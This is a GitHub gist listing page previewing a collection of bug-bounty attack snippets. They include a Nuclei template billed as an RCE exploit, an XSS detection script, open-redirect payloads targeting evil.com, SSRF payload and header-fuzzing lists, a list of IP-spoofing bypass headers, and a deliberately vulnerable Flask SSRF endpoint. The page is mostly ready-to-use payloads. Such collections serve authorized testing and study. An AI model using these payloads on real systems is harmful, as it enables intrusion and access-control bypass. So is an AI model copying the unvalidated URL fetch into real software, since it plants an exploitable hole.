Skip to content

Instantly share code, notes, and snippets.

View 0xbloody's full-sized avatar

0xbloody

14 followers · 111 following
View GitHub Profile
@c3l3si4n
c3l3si4n / nuclei-rce.yaml
Last active December 27, 2024 09:13
POC demonstrating RCE on Nuclei v2.5.1. The following PoC will execute `touch /tmp/rce_on_nuclei`. JS exploit based on CVE-2021-21224 PoCs
id: nuclei-rce
info:
name: Nuclei Template RCE by Chromium
author: c3l3si4n
severity: critical
tags: rce,hackback
headless:
- steps:
@R0X4R
R0X4R / inxss.sh
Last active April 21, 2025 05:54
A fast xss detector script
#!/bin/bash
#Requirements: KXSS(https://github.com/Emoe/kxss), Dalfox (https://github.com/hahwul/dalfox), QSreplace(https://github.com/tomnomnom/qsreplace)
#Preparation: subfinder -d target.tld -all -silent | httpx -silent | gauplus --random-agent -b eot,jpg,jpeg,gif,css,tif,tiff,png,ttf,otf,woff,woff2,ico,pdf,svg,txt -t 100 -o params.txt && cat params.txt | gf xss | sed "s/'/ /g" | sed "s/(/ /g" | sed "s/)/ /g" | qsreplace "FUZZ" 2> /dev/null | anew -q testparams.txt
#Usage: ./inxss.sh testparams.txt target.tld
lists=$1
mkout=$(echo -e "$2_$(date +%F_%H_%M_%S)")
mkdir -p $mkout
echo -e "Total $(cat $1 | wc -l) targets loaded"
sleep 6s
echo -e "[$(date +"%F %H:%M:%S")] Starting scan..."
@KathanP19
KathanP19 / Spreaker-param.txt
Created July 17, 2021 04:37
Tracker
__gaTracker
_csrf_token
_ga
a
accept_latest_tos_url
access_level
active
admin
adrevenue
@KathanP19
KathanP19 / Open-Redirect-Payloads.txt
Last active April 15, 2024 18:41
Open Redirect Payloads from zseano methodology.
\/evil.com
%5c%2fevil.com
\/\/evil.com
%5c%2f%5c%2fevil.com
\\evil.com
%5c%5cevil.com
//evil.com
%2f%2fevil.com
//[email protected]
/\/evil.com
@OTaKuHP
OTaKuHP / Bug Bounty Checklist and Cheatsheets.md
Created June 11, 2021 03:42
@ResistanceIsUseless
ResistanceIsUseless / Header-Injection.yaml
Last active December 30, 2024 07:50
Nuclei SSRF Fuzzing Template
id: header-injection
info:
name: Header SSRF Injection
author: nullrabbit
severity: high
description: Fuzzing headers for OOB SSRF
tags: fuzz,ssrf
requests:
@rollwagen
rollwagen / ssrf.py
Last active March 16, 2024 20:22
Minimal SSRF vulnerable python flask example application.
from flask import *
import requests
app = Flask(__name__)
@app.route('/follow')
def follow_url():
url = request.args.get('url', '')
if url:
return (requests.get(url).text)
@rootsploit
rootsploit / SSRF-Payloads.txt
Created January 28, 2021 11:01
Combination of SSRF Payloads
http://127.0.0.1:80
http://127.0.0.1:443
http://127.0.0.1:22
http://0.0.0.0:80
http://0.0.0.0:443
http://0.0.0.0:22
http://localhost:80
http://localhost:443
http://localhost:22
https://127.0.0.1/
@bendtheory
bendtheory / burplist.py
Created January 21, 2021 05:24
import xml.etree.ElementTree as ET
import urllib
import base64
import math
import sys
import re
# usage: Open Burp, navigate to proxy history, ctrl-a to select all records, right click and "Save Items" as an .xml file.
# python burplist.py burprequests.xml
# output is saved to wordlist.txt
@kaimi-
kaimi- / gist:6b3c99538dce9e3d29ad647b325007c1
Last active August 14, 2025 16:26
Possible IP Bypass HTTP Headers
CACHE_INFO: 127.0.0.1
CF_CONNECTING_IP: 127.0.0.1
CF-Connecting-IP: 127.0.0.1
CLIENT_IP: 127.0.0.1
Client-IP: 127.0.0.1
COMING_FROM: 127.0.0.1
CONNECT_VIA_IP: 127.0.0.1
FORWARD_FOR: 127.0.0.1
FORWARD-FOR: 127.0.0.1
FORWARDED_FOR_IP: 127.0.0.1